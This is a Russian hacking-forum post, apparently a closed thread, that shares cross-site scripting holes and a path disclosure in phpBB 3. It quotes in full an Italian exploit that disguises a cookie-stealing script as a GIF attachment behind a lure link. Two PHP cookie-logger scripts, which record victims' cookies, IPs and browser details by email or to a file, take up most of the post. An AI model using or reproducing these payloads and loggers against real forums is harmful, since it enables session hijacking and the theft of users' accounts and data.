Воть за небольшой промежуток времени нашёл в третьей ветке phpBB нымножко XSS. Всё примитивно и бонально, поэтому выкладываю сразу в паблиг, т.к. сильной ценности не представляет. Раскрытие пути http://localhost/phpbb3/includes/constants.php Пассивчег Code: http://localhost/phpbb3/memberlist.php?mode=group&g=">[_Your-code_]<hr bebe=" Code: http://localhost/phpbb3/memberlist.php?mode=">[_Your-code_]<hr bebe=" Полу-активчег К сожалению к тому моменту как мне припёрло писать этот пост, я вспомнил что тоха давал какойто сплойт-хсс на этот форум. Тогда я не придал этому значения, ибо искал более серъёзные вещи чем хсс, а теперь когда посмотрел что он мне там давал, я понел, что зря тока угробил время - багу нашли до меня =(. Воть вам сорец сплойта, переводите сами, ибо я в печали. Code: _________________________________________________________________________ / \ \ \ ,, / / '-.`\()/`.-' .--_'( )'_--. / /` /`""`\ `\ \ * SpiderZ Hacking Security * | | >< | | \ \ / / '.__.' Exploit: Xss phpBB 3.0 Author: SpiderZ Sito: www.spiderz.altervista.org Sito2: www.spiderz.netsons.org _________________________________________________________________________ Download: http://www.phpbb.it/download/phpBB-3.0.B1.zip _________________________________________________________________________ Apri un editor di testo come il "blocco note" inserisci il seguente script <script>document.location.replace('http://WWW.SITOWEB/FILE.php?c='+document.cookie);</script> salva il file in img.gif ( . GIF ) Quando stai per postare, vai in basso su : "Attachment uploading" inserisci la tua immagine. Adesso in basso trovi "Posted attachments" e sotto ad esso la tua immagine inserita es: ciao.gif adesso prendi il link diretto della img. es: http://sito_web/phpBB3/files/2_bef6678eecdd2b36db36dd7ed1544ecd.gif Ora non rimane che camuffare il link Esempio: [*url=http://sito_web/phpBB3/files/2_bef6678eecdd2b36db36dd7ed1544ecd.gif]Bella ragazza[/*url] Adesso tutti coloro che usano Internet explorer come browser, e visiteranno il tuo link... riceverai il loro cookie. Log cookie ( File.php ) <?php $ip = $_SERVER['REMOTE_ADDR']; $userAgent = $_SERVER['HTTP_USER_AGENT']; $accept=$_SERVER['HTTP_ACCEPT_LANGUAGE']; $cookie = $_GET['c']; $myemail = "LA TUA E-MAIL"; $today = date("l, F j, Y, g:i a") ; $subject = "Xss phpBB 3" ; $message = "Xss phpBB 3 Powered by Sfs (c) 2006 Ip: $ip Cookie: $cookie Browser: $userAgent Lingua: $accept Url: $base Giorno & Ora : $today \n "; $from = "From: $myemail\r\n"; mail($myemail, $subject, $message, $from); ?> ************************************** Modifica : $myemail = "LA TUA E-MAIL"; es: [email protected] ************************************** Log cookie Alternativo ( File.php ) <?php $cookie = $_GET['c']; $ip = getenv ('REMOTE_ADDR'); $date=date("j F, Y, g:i a"); $referer=getenv ('HTTP_REFERER'); $fp = fopen('file.txt', 'a'); fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>'); fclose($fp); ?> Стёб В бб-тегах нарушения синтаксиса можно добиться так: Code: [*url]http:// :!: yandex.ru[/*url] Ценности не имеет, т.к. управлять урлом смайла мы не имеем возможности. З.Ы. В процессе поиска багов как всегда использовался только моск - по багтракам не бегал. Grey: тема закрыта.
